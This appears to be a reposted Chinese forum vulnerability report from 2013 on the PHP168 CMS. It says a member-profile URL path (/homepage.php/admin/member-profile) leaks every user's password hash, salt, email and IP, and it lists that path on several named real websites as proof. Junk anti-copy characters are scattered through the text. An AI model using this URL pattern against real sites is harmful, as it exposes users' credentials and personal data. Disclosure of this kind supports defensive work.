|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile1 @2 J/ W- |3 \
' N9 T* x5 X# R! u5 a `" i- ?以PHP168官方演示站点为例,查看任意用户信息的页面链接为:2 b( b$ m Q/ E
0 X* X- m# n8 j" J# \& Nhttp://php168.cn/com/homepage.php/admin/member-profile
/ L7 m% \( }0 i+ Z# \% j6 l6 b$ j7 M0 ^* Y- M
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。) a$ }- Q- a9 t# z5 P5 \! |, |* {+ d
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg) l0 ]- E$ J- p! J9 b6 V# o! h- h
+ k- N8 o6 R0 s3 d* | 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:/ @/ A0 E; x- Y
1 H& z# M( D* o8 g r9 g1 q% Ghttp://www.zjfzol.com.cn/homepage.php/admin/member-profile
3 q. U4 |- p h# M, v9 r' D! m1 C- u% ~8 X) x
http://www.scswl.cn/homepage.php/admin/member-profile
5 q- Q2 [" u f$ p3 a+ ^% o2 u
1 n( V) D) e# Chttp://www.tunet.edu.cn/homepage.php/admin/member-profile
) Y( N7 c$ q& T% [9 w9 z" X! A- n8 s& ~4 {# g- Y/ U
http://www.itlead.com.cn/homepage.php/admin/member-profile; t4 L3 s1 C( c, p( v- ~
# H4 |2 ?8 @, F7 ^+ M* N
http://www.aedp.cn/homepage.php/admin/member-profile
. x5 ~1 E- a( r4 a; o7 z1 N; b1 {9 l9 v7 W
http://www.qianlongnews.com/homepage.php/test/member-profile
* g/ K/ f* b: L+ J: s
/ W3 W8 @3 A; D% Q8 h- P1 T4 phttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]1 P6 _3 \( r$ c7 z! ^- n
[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对